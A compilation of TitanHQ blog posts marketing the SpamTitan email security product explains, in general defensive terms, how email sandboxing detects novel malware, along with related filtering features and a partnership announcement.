Set Up Message Sandboxing\r\nThe easiest way to get started and set up message sandboxing is to use SpamTitan Email Security. SpamTitan has\r\nbeen developed to be easy to set up and use by businesses of all sizes, from small offices and coffee shops to small\r\nand medium-sized businesses and large enterprises. 
Being cloud-based, there is no software to install, just a small\r\nconfiguration change to your MX record (information on how to do this is provided). The solution can be accessed\r\nthrough a web-based interface, and the solution can be configured in just a few minutes.\r\nUsers benefit from spam and phishing detection rates of more than 99.99%, a very low false positive rate and a\r\nBitdefender-powered email sandbox. The email sandbox leverages advanced machine learning algorithms,\r\naggressive behavior analysis, anti-evasion techniques, and memory snapshot comparison to detect zero-day\r\nthreats.\r\nWithout an email sandbox, you are likely to be exposed to many malicious messages. With sandbox email\r\nprotection, you have much better control of the content that reaches user inboxes.\r\nHow to Sandbox Email Attachments\r\nby G Hunt | October 15, 2023 | Phishing \u0026 Email Spam, Spam Software\r\nDo you know how to sandbox email attachments? If you have yet to start using a sandbox for email, you will be\r\nexposed to advanced malware and phishing threats. The good news is it is quick and easy to improve protection\r\nwith a sandbox, and it requires no advanced techniques or skills, but before presenting an easy email sandboxing\r\nsolution, we should explain why email sandboxing is now a vital part of email security.\r\nEmail Sandboxing Detects Advanced and Sophisticated Threats\r\nA hacker writes the code for a new malware variant or generates the code using an AI tool, and then sends that\r\nmalware via email. A traditional email security solution will not block that malware, as it has not detected it before\r\nand it doesn’t have the malware signature in its definition list. The email would most likely be delivered, and the\r\nintended recipient could open it and infect their device with malware. From there, the entire network could be\r\ncompromised and ransomware could be deployed.\r\nHow could a new, previously unseen threat be blocked? 
The answer is email sandboxing. When a file passes\r\ninitial checks, such as AV scans, the attachment is sent to an email sandbox where its behavior is analyzed. It\r\ndoesn’t matter if the malware has not been seen before. If the file performs any malicious actions, they will be\r\ndetected, the threat will be blocked, and if that threat is encountered again, it will be immediately neutralized.\r\nEmail sandboxing is now an essential part of email security due to the sheer number of novel malware variants\r\nnow being released. That includes brand new malware samples, malware with obfuscated code, polymorphic\r\nmalware, and known malware samples that differ just enough to avoid signature-based detection mechanisms.\r\nWithout behavioral analysis in a sandbox, these threats will be delivered.\r\nThe Easy Way to Sandbox Email Attachments\r\nSetting up an email sandbox need not be complicated and time-consuming. All you need to do is sign up for an\r\nadvanced cloud-based email security solution such as SpamTitan Email Security. SpamTitan is a 100% cloud-based email security solution that requires no software downloads or complex configurations. Just point your MX\r\nrecord to the SpamTitan Cloud and use your login credentials to access the web-based interface. You can adjust\r\nthe settings to suit your needs, and the setup process is quick, easy, and intuitive, and generally takes around 20-30\r\nminutes.\r\nThe solution is fed threat intelligence from a global network of more than 500 million endpoints, ensuring it is\r\nkept up to date and can block all known and emerging threats. 
You will be immediately protected from known\r\nmalware and ransomware threats, phishing emails, spam, BEC attacks, and spear phishing, and you will benefit\r\nfrom email sandboxing, where suspicious emails are sent for deep analysis to identify zero-day phishing and\r\nmalware threats.\r\nThe SpamTitan email sandbox is powered by Bitdefender and has purpose-built, advanced machine learning\r\nalgorithms, decoys and anti-evasion techniques, anti-exploit, and aggressive behavior analysis. If a file is analyzed\r\nin the sandbox and found to be malicious, SpamTitan updates Bitdefender’s Global Protective Network, ensuring\r\nthat the new threat is blocked globally.\r\nEmail sandboxing doesn’t need to be complicated. Just use SpamTitan from TitanHQ. SpamTitan is available on a\r\nfree trial, with customer support provided throughout the 14-day trial to help you get the most out of the solution.\r\nWe are sure you will love it for the level of protection provided and how easy it is to use.\r\nHow Does a Sandbox Work?\r\nby G Hunt | October 5, 2023 | Phishing \u0026 Email Spam, Spam Software\r\nSandboxing is a security feature that protects against malicious code. Rather than execute potentially unsafe code\r\nin a standard environment, it is sent to the sandbox – an isolated environment where no harm can be caused.\r\nHow Does a Sandbox Work?\r\nA sandbox is an important cybersecurity tool for protecting host devices, operating systems, and data from being\r\nexposed to potential threats. The sandbox is a highly controlled system that is used to analyze untrusted\r\napplications, files, or code. The sandbox is isolated from the network and real data, and there are only essential\r\nresources that are authorized for use. It is not possible for a sandboxed file to access other parts of the network,\r\nresources, or the file system, only those specifically set up for the sandbox.\r\nSandboxes can have different environments. 
One of the most common implementations uses virtualization. A\r\nvirtual machine (VM) is set up specifically to examine suspicious programs and code. Some sandboxes include\r\nemulation of operating systems to mimic a standard endpoint. Some malware samples perform checks of their\r\nenvironment before executing malicious routines to make sure they are not in a VM. If a VM is detected, the\r\nmalware will not execute malicious routines and may self-delete to prevent analysis. By emulating a standard\r\nendpoint, these checks can be passed to allow analysis. Some sandboxes have full system emulation, which\r\nincludes the host machine’s physical hardware as well as its operating system and software. These sandboxes\r\nprovide deeper visibility into the behavior and impact of a program.\r\nIn email security, files, attachments, URLs, and programs are sent to the sandbox to check whether they are benign\r\nor malicious. The analyses can take from a few seconds to a few minutes, and if any malicious activity is\r\ndetected, the file will be either quarantined and made available for further study or it will be deleted. Any other\r\ninstances of that file will be removed from the email system, and any future encounters will see the file,\r\nattachment, URL, or program deleted.\r\nSpamTitan Email Sandboxing\r\nSpamTitan Email Security includes a Bitdefender-powered email sandbox to ensure users are protected against\r\nzero-day threats. All emails are subjected to a barrage of checks and tests, including scans using two different\r\nantivirus engines. SpamTitan features strong machine learning, static analysis, and behavior detection\r\ntechnologies to ensure that only files that require deep analysis get sent to the sandbox. 
This is important, as\r\ndeeper analysis may take several minutes, so verified clean and safe messages will not be unduly delayed.\r\nFiles that are sent to the sandbox for deep analysis are executed and monitored for signs of malicious activity, with\r\nself-protection mechanisms in place to ensure every evasion attempt by a piece of malware is properly\r\nmarked. The sandbox has purpose-built, advanced machine learning algorithms, decoys and anti-evasion\r\ntechniques, anti-exploit, and aggressive behavior analysis. All results are checked across known threats in an\r\nextensive array of online repositories. If a malicious file is detected, the sandbox updates Bitdefender’s cloud\r\nthreat intelligence service – the Bitdefender Global Protective Network – and the sandbox will never have to\r\nanalyze that threat again as it will be blocked globally.\r\nIf you want to improve protection against zero-day threats, give the TitanHQ team a call to find out more about\r\nSpamTitan. SpamTitan is available on a free trial to allow you to test it out in your own environment before\r\nmaking a purchase decision.\r\nAdditional Articles Related to Email Sandboxing\r\nEmail Sandboxing\r\nEmail Sandboxing Service\r\nSandboxing Blocking Malware Threats\r\nEmail Sandboxing Pattern Filtering\r\nHow does an email sandbox block malware?\r\nEmail Sandboxing and Message Delivery Delays\r\nCommonly Asked Questions about Email Sandboxing\r\nWhat is sandbox security?\r\nHow does a sandbox work?\r\nHow to sandbox email attachments\r\nWhat is message sandboxing?\r\nWhat is malware sandboxing for email?\r\nWhat is sandboxing in cybersecurity?\r\nWhat are the advantages and disadvantages of email sandboxing?\r\nSandboxing Technology for Email\r\nWhat is a malicious file sandbox for email?\r\nEmail Sandboxing is the Key to Blocking More Malware 
Threats\r\nby G Hunt | September 27, 2023 | Phishing \u0026 Email Spam, Spam Software\r\nhttps://www.spamtitan.com/blog/email-sandboxing-key-blocking-malware-threats/\r\nEmail security solutions with\r\nemail sandboxing block more malware threats than traditional spam filters, even novel malware variants that have\r\nyet to be identified as malicious. Without this important feature, emails with malicious attachments will likely be\r\ndelivered to inboxes where they can be opened by employees. All it takes is for one employee to open a malicious\r\nfile for malware to be installed that gives a threat actor the foothold they need for a comprehensive attack on the\r\nnetwork.\r\nWhat is an Email Sandbox?\r\nIn cybersecurity terms, a sandbox is an isolated, virtual machine where potentially unsafe code can be executed in\r\nsafety, files can be subjected to deep analysis, and URLs can be visited without risk. In the sandbox, the behavior\r\nof files, code, and URLs is inspected, and since the sandbox is not networked and there is no access to real data or\r\napplications, there is no risk of causing any damage. Email sandboxing is used to identify malicious code and\r\nURLs in emails. The email sandbox mirrors standard endpoints to trick malicious actors into thinking that they\r\nhave reached their intended target. Emails may pass front-end tests that look at the reputation of the sender, email\r\nheaders, the content of the messages, and subject attachments to signature-based anti-virus tests, but there is no\r\nguarantee that the emails are safe without sandbox-based behavioral analysis.\r\nWhy is Email Sandboxing Important?\r\nCyber threat actors have been developing techniques for bypassing standard email security solutions such as\r\nembedding malicious URLs in PDF attachments, hiding malicious content in compressed files, using multiple\r\nredirects on hyperlinks, and including links to legitimate cloud-based platforms such as SharePoint for distributing\r\nmalware. 
Traditional email security solutions can filter out spam and phishing emails, but they often fail to block\r\nmore sophisticated threats, especially zero-day malware threats. Email sandboxing provides an extra layer of\r\nprotection against sophisticated threats such as spear-phishing emails, advanced persistent threats (APTs), and\r\nnovel malware variants.\r\nA few years ago, new malware variants were released at a fairly slow pace; however, threat actors are now using\r\nautomation and artificial intelligence to generate new malware variants at an alarming rate. Malware samples are\r\nused that deviate sufficiently from a known threat to be able to bypass signature-based detection mechanisms,\r\nensuring they reach their intended targets. Rather than just using one version of malware in their email campaigns,\r\ndozens of versions are created on a daily basis. While security awareness training will help employees identify and\r\navoid suspicious emails, threat actors have become adept at social engineering and often hoodwink employees.\r\nThe SpamTitan Email Sandbox\r\nThe SpamTitan email sandbox is a powerful next-generation security feature with award-winning machine-learning and behavioral analysis technologies. Powered by Bitdefender, the SpamTitan sandbox for email allows\r\nfiles to be safely detonated where they can do no harm. Email attachments that pass the barrage of checks\r\nperformed by SpamTitan are sent to the sandbox for deep analysis. The sandbox is a virtual environment that is\r\nconfigured to appear to be a typical endpoint and incorporates purpose-built, advanced machine learning\r\nalgorithms, decoys and anti-evasion techniques, anti-exploit, and aggressive behavior analysis. 
Files are also\r\nsubjected to checks across an extensive array of online repositories, with the sandbox checks taking just a few\r\nminutes. That ensures that genuine emails are not unduly delayed. If malicious properties are detected in the\r\nsandbox, the threat intelligence is passed to Bitdefender’s Global Protective Network (cloud threat intelligence\r\nservice). If the threat is encountered again, it will be detected and blocked without having to be analyzed again in\r\nthe sandbox.\r\nThe SpamTitan sandbox is used for a wide range of attachments, including office documents to check for\r\nmalicious URLs, macros, and scripts, and all executable and application files. The sandbox allows SpamTitan to\r\ndetect polymorphic malware and other threats that have been designed for use in undetectable targeted attacks. If a\r\nmalicious file is detected, the email is not sent to a spam folder where it could be opened by an end user; instead, it is\r\nquarantined in a directory on the local email server which only an administrator can access. Administrators may\r\nwish to conduct further investigations to gain insights into how their organization is being targeted.\r\nThreat actors are conducting increasingly sophisticated attacks, so email security solutions need to be deployed\r\nthat are capable of detecting these advanced threats. With zero-day threats on the rise, now is the ideal time to\r\nimprove your email defenses with SpamTitan. 
Why not sign up for a free trial of SpamTitan today to put the\r\nsolution to the test to see the difference the advanced threat detection capabilities make to your security posture?\r\nProduct demonstrations can also be requested by contacting TitanHQ, and our friendly sales team will be more\r\nthan happy to discuss SpamTitan with you and the best deployment options to meet the needs of your business.\r\nCommonly Asked Questions About Email Sandboxing\r\nby G Hunt | September 15, 2023 | Phishing \u0026 Email Spam, Spam Software\r\nHere are commonly asked questions about email sandboxing, so you know what to expect from an email security solution\r\nwith a sandbox, and why this advanced feature is vital for email security.\r\nWhat is an Email Sandbox?\r\nOne of the commonly asked questions about email sandboxing is: what is an email sandbox? Like the children’s\r\nequivalent, it is a safe space for building, destroying, and experimenting. In cybersecurity terms, it is an isolated\r\nenvironment where harm cannot be caused to anything outside of that environment. 
An email sandbox is an\r\nisolated virtual machine that is used for performing risky actions, such as opening unknown attachments and\r\nanalyzing files and URLs in depth, rather than using a real machine where there is a risk of harm being caused\r\nsuch as file encryption by ransomware, theft of sensitive information, or wiping of data.\r\nWhy is an Email Sandbox Important?\r\nEmail is the most common vector used in cyberattacks. Through emails, cyber threat actors can gain initial access\r\nto a protected network from where they can steal sensitive data or move laterally for a more comprehensive attack.\r\nOne of the most common ways of gaining remote access is through malware. Once malware is downloaded, an\r\nattacker can remotely perform commands and gain full control of an infected device. While businesses use\r\nantivirus software to detect and remove malware, these solutions are signature-based. In order to detect malware,\r\nthe signature of the malware must be in the definition list used by the anti-virus solution, which means the\r\nmalware must have previously been encountered. Novel malware variants that have not yet been determined to be\r\nmalicious will not be identified as such and will therefore be delivered to inboxes where they can be executed by\r\nemployees. An email sandbox is used to safely detonate suspicious files and inspect their behaviors. The\r\nbehavioral analysis allows previously unknown malware samples to be identified and blocked. This is important\r\ndue to the volume of new malware samples that are now being released.\r\nHow Does an Email Sandbox Protect Against Malware?\r\nEmail security solutions with sandboxing perform the same front-end checks as traditional email security\r\nsolutions and will identify and block many malicious messages. 
If the initial checks are passed, and the messages\r\nare determined to potentially pose a risk, they will be sent to the sandbox for behavioral analysis. Once inside the\r\nsafety of the sandbox, the attachments will be opened and subjected to various tests. The sandbox is configured to\r\nappear to be a normal endpoint, so any malware will be tricked into running malicious commands as it would if it\r\nhad reached its intended target. The actions of the file are assessed, and if they are determined to be malicious they\r\nwill be sent to a quarantine folder. By performing these checks, new malware variants can be identified and\r\nblocked before any harm is caused.\r\nWill Sandboxing Delay Message Delivery?\r\nPerforming standard checks of messages is a quick process, often causing imperceptible delays in mail delivery.\r\nPerforming in-depth analysis takes longer, so there will be a delay in message delivery. Many emails will not need\r\nto be sent to the sandbox and will be delivered immediately, but if sandboxing is required, there will be a delay\r\nwhile the behaviors of the email and attachments are analyzed. Some malware has built-in anti-analysis\r\ncapabilities and will delay any malicious processes to combat sandboxing. Time is therefore required to ensure full\r\nanalysis. With SpamTitan, the delay will be no longer than 20 minutes.\r\nHow Can I Avoid Message Delivery Delays?\r\nSpamTitan incorporates artificial intelligence and machine learning capabilities which minimize the number of\r\nemails that are sent to the sandbox, and SpamTitan will check every 15 seconds to ensure that emails are delivered\r\nas soon as the sandbox analysis is complete. SpamTitan’s sandbox is part of Bitdefender’s Global Protective\r\nNetwork, which ensures rapid checks of suspicious messages. 
To avoid delays, certain email addresses and\r\ndomains can be added to a whitelist, which means they will not be sent to the sandbox for analysis, ensuring rapid\r\ndelivery.\r\nWhat are the Benefits of Email Sandboxing?\r\nThe sandbox provides an important extra layer of protection against malware threats and malicious links. It will\r\ndetect advanced attacks early and prevent breaches, reduce incident response costs and efforts, reduce the threat-hunting burden, and increase the detection rate of elusive threats in the pre-execution stage, including APTs,\r\ntargeted attacks, evasion techniques, obfuscated malware, custom malware, and ransomware.\r\nHow Does the SpamTitan Sandbox Work?\r\nSpamTitan will subject all inbound emails to a battery of front-end tests, and if these are passed but the email is\r\nstill suspicious, the message and attachment will be sent to the sandbox and the user will be informed that the\r\nmessage is in the sandbox for review. The email and attachments will then be opened in an isolated cloud platform\r\nor a secure customer virtual environment. If malware is detected, the email is blocked and assigned ATP.Sandbox\r\nand will be listed under “Viruses” in the relevant quarantine report, and the intelligence gathered will be used to\r\nprotect all users from that threat in the future. 
After twenty minutes of interrogation, if no malicious actions are\r\nidentified, the file is marked clean and the email is passed on to the recipient.\r\nHow Can I Find Out More About Email Security and Sandboxing?\r\nIf you have unacceptable numbers of spam and malicious messages being delivered to inboxes, are receiving large\r\nnumbers of queries about suspicious emails from your employees, or if you have experienced a malware infection\r\nvia email recently, you should speak with TitanHQ about improving email security with SpamTitan.\r\nSpamTitan has artificial intelligence and machine learning capabilities, a next-gen email sandbox, and a 99.99%\r\ndetection rate with a very low false positive rate. Further, SpamTitan is very competitively priced, easy to use, and\r\nrequires little maintenance. The solution is also available on a 100% free trial, with full product support provided\r\nfor the duration of the trial.\r\nTitanHQ Announces New Partnership with India’s Leading Managed Service\r\nProvider\r\nby G Hunt | September 13, 2023 | Industry News\r\nTitanHQ has recently announced a new partnership with one of India’s leading managed service providers, Tata\r\nTele 
Business Services (TTBS). TTBS is the leading provider of business connectivity and communications\r\nsolutions in India and has the largest portfolio of ICT services for businesses in the country.\r\nLike many countries, India is facing a major increase in cybercrime. 78% of Indian organizations experienced a\r\nransomware attack in 2021, web-based attacks have jumped sharply, and a 2022 Group-IB study placed India third\r\nglobally for phishing attacks in 2021 with more attacks than any other country in the Asia-Pacific region. Indian\r\nbusinesses need to ensure that they have the necessary defenses in place to combat increasingly sophisticated\r\ncyberattacks, especially attacks that target employees.\r\nBusinesses often turn to their managed service providers for cybersecurity and seek solutions that can protect\r\nthem against malware and phishing. TTBS provides cybersecurity solutions to SMBs and its cybersecurity\r\npackages have now been improved with the addition of SpamTitan email security and the WebTitan DNS-based\r\nweb filter. Both solutions are 100% cloud-based, easy for MSPs to add to their service stacks, and easy to manage.\r\nTTBS provides advanced email security with phishing protection through the Tata Tele Email Security Plus\r\nProgram, which delivers advanced threat protection for email through TitanHQ’s AI-driven SpamTitan anti-phishing solution. Protection against Internet-based threats is provided through the Tata Tele Smart Internet\r\nProgram, which includes web filtering provided by WebTitan. WebTitan is fed threat intelligence from a network\r\nof 650 million endpoints, ensuring malicious websites are blocked before threats are encountered.\r\n“We are delighted to partner TitanHQ to offer Tata Tele Email Security- an advanced email security solution that\r\nis in line with Zero Trust security agenda of enterprises,” said Vishal Rally, Sr. VP \u0026 Head – Product, Marketing\r\nand Commercial, Tata Teleservices Ltd. 
“As a leading technology enabler TTBS is committed to simplifying and\r\ndemocratizing email security for businesses of any size. This partnership will ensure the protection of enterprise\r\nsensitive data efficiently and cost effectively”.\r\n“We are excited to partner with Tata Teleservices to offer their growing customer base our advanced\r\nthreat protection layer for email and web security,” said TitanHQ CEO, Ronan Kavanagh. “Over several years\r\nTata Teleservices has excelled in the areas of customer service and security, our partnership further cements this\r\ncommitment”.\r\nIf you are an MSP that has yet to start offering cybersecurity packages to your clients, or if you are keen to\r\nimprove protection through AI-driven cybersecurity solutions, give the TitanHQ channel team a call to find out\r\nmore about how TitanHQ can help you better protect your clients and improve your profits.\r\nEmail Sandboxing and Message Delivery Delays\r\nby G Hunt | September 10, 2023 | Phishing \u0026 Email Spam, Spam Software\r\nEmail sandboxing is important for security, as it will block threats that traditional email filters fail to detect. While\r\nsandboxing is now considered to be an essential element of email security, one disadvantage is that it will delay\r\nthe delivery of emails. In this post, we will explain why that is and how email delivery delays can be minimized or\r\navoided altogether.\r\nWhat Does Queued for Sandbox Mean?\r\nIf you use SpamTitan or another email security solution with email sandboxing, you may see the message “email\r\nqueued for sandbox” from time to time. “Queued for sandbox” means the message has been determined to\r\nwarrant further inspection and has been sent to the sandbox for deeper analysis. 
This is most likely because the\r\nemail includes an attachment that is determined to be risky, even though it has passed the initial antivirus scans.\r\nWhile email sandboxing is important for security, there is a downside, and that is that processing messages in a\r\nsandbox and conducting behavioral inspection takes a little time. That means there will be a delay in delivering\r\nmessages that have been sandboxed while behavioral checks are performed. Messages will only be delivered once\r\nall sandbox checks have been passed. If a large volume of suspicious emails is received at the same time,\r\nmessages will be queued for analysis, hence the “queued for sandbox” message being displayed.\r\nSandbox Delays for Inbound Emails\r\nThe processing of messages in a sandbox can take a little time. Cyber threat actors do not want their malware and\r\nmalicious code analyzed in a sandbox, as it will allow their malware to be identified. Further, once a malware\r\nsample has been identified, details will be shared with all other users of that security solution, which means no\r\nuser will have that malicious file delivered to their inbox. SpamTitan’s email sandbox is powered by Bitdefender,\r\nso all members of the Bitdefender network who subscribe to its feeds will also be protected.\r\nMany malware samples now have anti-sandbox technologies to prevent this. When the malware is dropped on a\r\ndevice it will analyze the environment it is in before launching any malicious actions. If it senses it is in a sandbox\r\nit will terminate and may attempt to self-delete to prevent analysis. One technique often seen is delaying any\r\nmalicious processes for a set time after the payload is delivered. Many sandboxes will only analyze files for a\r\nshort period, and the delay may be sufficient to trick the sandbox into releasing the file. 
It is therefore necessary to\r\ngive the sandbox sufficient time for a full analysis.\r\nAre Your Sandbox Delays Too Long?\r\nConducting analyses of emails in a sandbox is resource-intensive and can take several minutes, and there may be\r\ndelays to email delivery that are too long for some businesses. There are ways to avoid this, which we will discuss\r\nnext, but it may be due to the email security solution you are using. The SpamTitan email sandbox is part of\r\nBitdefender’s Global Protective Network, which was chosen not only for cutting-edge threat detection but also for the\r\nspeed of analysis. If you are experiencing long delays receiving emails, you should take advantage of the free trial\r\nof SpamTitan to see the difference the solution makes to the speed of email delivery for emails that require\r\nsandbox analysis.\r\nHow the SpamTitan Sandbox for Email Minimizes Delays\r\nSpamTitan does not send all messages to the sandbox, to avoid unnecessary email delays. If a message is\r\nsuspicious and the decision is taken to send it to the sandbox for analysis, SpamTitan will check to see if the\r\nanalysis has been completed every 15 seconds to ensure it is released in the shortest possible time frame.\r\nEmployees will be aware that they have received a message that has been sent to the sandbox as the message\r\ndelivery status is displayed in their history. Provided all sandbox checks are passed, the email will be delivered.\r\nThis process will take no longer than 20 minutes. If a file is determined to be legitimate, details are retained by\r\nSpamTitan so if the attachment or message is encountered again, it will not be subjected to further analysis in the\r\nsandbox.\r\nHow to Avoid Sandbox Delays to Message Delivery\r\nThere are ways to avoid messages being placed in the queue for sandbox inspection. 
While it is not always\r\nadvisable for security reasons, it is possible to whitelist specific email addresses and domains. This will ensure\r\nthat emails from important clients that need a rapid response will be delivered without delay and will not be sent\r\nto the sandbox. The problem with this approach is that if a whitelisted email address or a domain is compromised\r\nand used to send malicious messages, they will be delivered.\r\nWhat Happens if a Message is Misclassified as Malicious?\r\nFalse positives do occur with spam and phishing emails as email filtering is not an exact science. While this is rare\r\nwith SpamTitan, any misclassified emails will not be deleted as they will be sent to a quarantine folder. That\r\nfolder can be configured to be accessible only by an administrator. The administrator can then check the validity\r\nof the quarantined messages and release any false positives. Since SpamTitan has artificial intelligence and\r\nmachine learning capabilities, it will learn from any false positives, thus reducing the false positive rate in the\r\nfuture.\r\nTalk with TitanHQ About Improving Email Security\r\nIf you are not currently using an email security solution with sandboxing or if your current email security solution\r\nis not AI-driven, contact TitanHQ to find out more about how SpamTitan can improve protection against\r\nsophisticated email threats. SpamTitan is available on a free trial to allow you to put the product to the test before\r\ndeciding on a purchase, and product demonstrations can be arranged on request. If you proceed with a purchase,\r\nyou will also benefit from TitanHQ’s industry-leading customer service. 
If you ever have a problem or a query,\r\nhelp is rapidly at hand.\r\nHow Does an Email Sandbox Block Malware?\r\nby G Hunt | September 5, 2023 | Phishing \u0026 Email Spam, Spam Software\r\nYou may have heard that email sandboxing is an important security feature, but how does an email sandbox block\r\nmalware and why is this security feature necessary? In this post, we explain what an email sandbox is, why it is\r\nnow an important element of email security, and how email sandboxes work.\r\nAn email sandbox is a secure and isolated environment where emails and their attachments are subjected to\r\nbehavioral analysis. In the sandbox, malicious files and code can be safely detonated where no harm can be\r\ncaused. Say an email is received that contains malicious code that is used to drop and execute ransomware on a\r\ndevice. Executing that code on a standard machine would initiate the process that ends with file encryption.\r\nExecute that code in an email sandbox and the malicious behavior would be detected and no harm would be\r\ncaused. 
The email and code will then be eradicated from the email system, and the threat intelligence gathered will\r\nbe sent to a global network to ensure that if the email or code is encountered again it will be immediately blocked.\r\nMany Email Security Solutions Fail to Detect the Most Serious Threats\r\nTraditional email security solutions perform many tests on emails to determine the likelihood of them being spam\r\nor malicious. DMARC and SPF are used to check the legitimacy of the sender, checks are performed on the\r\nreputation of an IP address/domain, and the subject, title, and body of a message are analyzed for signs of phishing\r\nand spam. Email attachments are also subject to anti-virus checks, which will identify and block all known\r\nmalware variants. The result? Filtered emails contain no known spam, no known malicious hyperlinks, and no\r\nknown malware.\r\nThe problem with traditional email security solutions is they are unable to detect unknown spam, phishing\r\nattempts, and malware. If a threat actor uses a previously unseen phishing email, which includes either a link to a\r\nfresh URL or a site with a good reputation, that email will most likely be delivered. If a new malware variant is\r\nsent via email, its signature will not be present in any virus or malware definition list and it will similarly be\r\ndelivered to an end user’s inbox. Threat intelligence is shared with email security solutions and they are constantly\r\nupdated as new threats are found, but there is a lag, during which time these threats will be delivered to inboxes.\r\nThat is why an email sandbox is needed.\r\nHow an Email Sandbox Works\r\nAntivirus scans will block the majority of malware, but not novel (zero-day) malware threats. 
When an email\r\nsecurity solution has email sandboxing, the same checks are initially performed, and if they are passed, emails are\r\nsent to the sandbox for further analysis. The email sandbox is an isolated environment on a virtual machine that is\r\nconfigured to look like a genuine endpoint. As far as the threat actor is concerned, their email will have reached\r\ntheir intended target and the file should execute as it would on a standard machine.\r\nIn the sandbox, emails and attachments are opened, links are followed, and behavior is analyzed in detail to\r\ndetermine if any malicious or suspicious actions occur, such as command-and-control callbacks, attempted\r\nfile encryption, or scans for running processes. If a Word document is opened that contains no hyperlinks, no\r\nmacros, and no malicious scripts, and nothing suspicious occurs in the time it is present in the sandbox, the file\r\nwill be determined to be benign and the email will then be delivered to the intended recipient. If any malicious\r\nactions are detected, the file will be sent to a local quarantine directory where it can only be accessed by the\r\nadministrator. The intelligence gathered will be sent to the global network and all users will be protected almost\r\ninstantly. All copies of that message and the attachment will also be removed from the entire mail system.\r\nEmail Sandboxing and AI-Driven Threat Detection are Now Vital\r\nEmail sandboxing is now vital for email security as new malware variants are being released at an incredible rate\r\nand signature-based detection methods cannot detect new malware threats. In addition to email sandboxing,\r\nartificial intelligence must be leveraged to look for novel phishing messages, as phishing attempts are also\r\nincreasing in sophistication. 
These AI-based checks look for messages that deviate from the typical messages\r\nreceived by a company, and greatly reduce the volume of spam and phishing emails that reach inboxes.\r\nThe threat landscape is constantly changing so advanced email defenses are now essential. If you are still using an\r\nemail security solution without email sandboxing and AI-driven threat detection, your company is at risk. Speak to\r\nthe team at TitanHQ to find out more about SpamTitan and how the award-winning email security solution can\r\nenhance your company’s security posture.\r\nEmail Sandboxing, Pattern Filtering, and Other Much-Loved SpamTitan Features\r\nby G Hunt | September 1, 2023 | Network Security, Spam Software\r\nSpamTitan is a next-generation anti-spam, anti-phishing, and anti-malware solution for businesses that\r\nincorporates AI-based threat detection, email sandboxing, and many other advanced email security features. Some\r\nof the most important and best-loved features of SpamTitan are explained below:\r\nEmail Sandboxing in SpamTitan\r\nEmail sandboxing is a vital element of email security, yet many email security solutions lack this feature. 
An email\r\nsandbox is a secure virtual machine where links can be followed and attachments opened without causing\r\nany harm. A malicious link that leads to an automatic malware download can be followed in safety, and even the\r\nnastiest piece of malware can be executed without risk, as the sandbox is isolated, not connected to any network,\r\nand contains no real data.\r\nThe sandbox is configured to appear to be a genuine endpoint in order to trick malicious actors into thinking\r\nmalware has reached its intended target. When a file is opened in the sandbox it is subject to deep analysis, and\r\nany malicious or suspicious actions are detected. Emails are subject to a battery of front-end checks, including\r\nscans using two anti-virus engines, and any emails that pass these checks but are determined to potentially pose a\r\nrisk are sent to the sandbox for behavioral analysis. That includes emails along with any attached documents,\r\nspreadsheets, and executable files.\r\nSandboxing for email is important because of the speed at which novel malware samples are used in attacks.\r\nRather than just using one version of a keylogger in a campaign, a threat actor will use dozens of versions of that\r\nkeylogger, each differing slightly to evade signature-based detection mechanisms. AI and automation are used by\r\nthreat actors to churn out new malware variants rapidly, and signature-based detection alone is no longer good\r\nenough. With sandboxing, email protection is greatly improved against these zero-day threats, which would\r\notherwise be delivered to end users’ inboxes.\r\nPattern Filtering in SpamTitan\r\nOne of the most loved features of SpamTitan is Pattern Filtering. It saves IT security teams a considerable amount\r\nof their precious time by ensuring spammy and phishy emails are not delivered. 
The Pattern Filtering feature\r\nallows administrators to use their own terminology to block inbound emails. Simply set a word or phrase through\r\nPattern Filtering, and SpamTitan will search the subject line and message body and can be configured to generate\r\na warning or quarantine the email if the word or phrase is found.\r\nAn example of where this can be useful is combating the Nigerian scam/419 fraud, a type of advance-fee fraud.\r\nThe 419 comes from Section 419 of the Nigerian Criminal Code, which prohibits this kind of scam. While the\r\nscam is common with Nigerian cybercriminals, cybercriminal groups in many different countries also conduct this\r\ntype of scam. While the themes of the emails vary, they all have the same aim. In a typical example, a prominent\r\nperson with substantial funds in their account has been unable to transfer the funds out of the country due to\r\nunfair restrictions. They offer to transfer these funds to the user’s account to get the money out of the country in\r\nexchange for a percentage of those funds as payment, which may be as high as 20%, a life-changing\r\namount of money. The catch? In order to proceed, charges need to be covered and they must be paid in advance.\r\nThe Pattern Filtering option can be used to block these emails by incorporating phrases commonly used in these\r\nemails.\r\nGeo-Filtering in SpamTitan\r\nSpamTitan also incorporates geo-filtering, which allows users to block emails from specific countries. If you\r\nnever do business with countries in Africa, for example, you can simply block all emails coming from African IP\r\naddresses with a few clicks of a mouse, rather than manually blocking IP addresses from which you get a lot of\r\nspam emails. This feature saves IT teams a considerable amount of time. One user who has benefited greatly from\r\nthis feature is Benjamin Jeffrey, IT manager at M\u0026M Golf Cars. 
His company was receiving many requests from\r\ncountries that the company does not do business with and was getting flooded with spam emails from a specific IP\r\nsubnet in one country. He configured the geo-filtering and instantly blocked all those messages. When he checked 6\r\nmonths after configuring that feature, around 12,000 emails had been blocked. Geo-blocking is also useful for\r\nblocking malware quickly. Malware distribution campaigns are often launched from a handful of countries, and\r\ngeo-filtering can be used to block those messages with ease.\r\nAI and Machine Learning in SpamTitan\r\nSpamTitan has AI and machine learning capabilities to improve the detection of spam and phishing emails. These\r\ntechnologies learn about the emails that are typically received by a company and create a baseline against which\r\nnew emails can be measured. When emails deviate from the norms, they are flagged as risky and are subjected to\r\nmore stringent security checks or are quarantined for manual inspection. These technologies greatly improve spam\r\nand phishing email catch rates and allow SpamTitan to improve day by day. These technologies are a vital defense\r\nagainst zero-day phishing threats – new threats that have not been encountered on the 500+ million endpoints\r\nfrom which threat intelligence is gathered.\r\nFind out More About SpamTitan\r\nThese are just some of the most loved and most beneficial features of SpamTitan. In addition to having a high\r\ncatch rate and low false positive rate, SpamTitan is one of the most affordable email security solutions on the\r\nmarket, it’s quick and easy to set up, and it requires little maintenance. The features, price, and ease of use are why it\r\nis loved by thousands of small- and medium-sized businesses, enterprises, and managed service providers. 
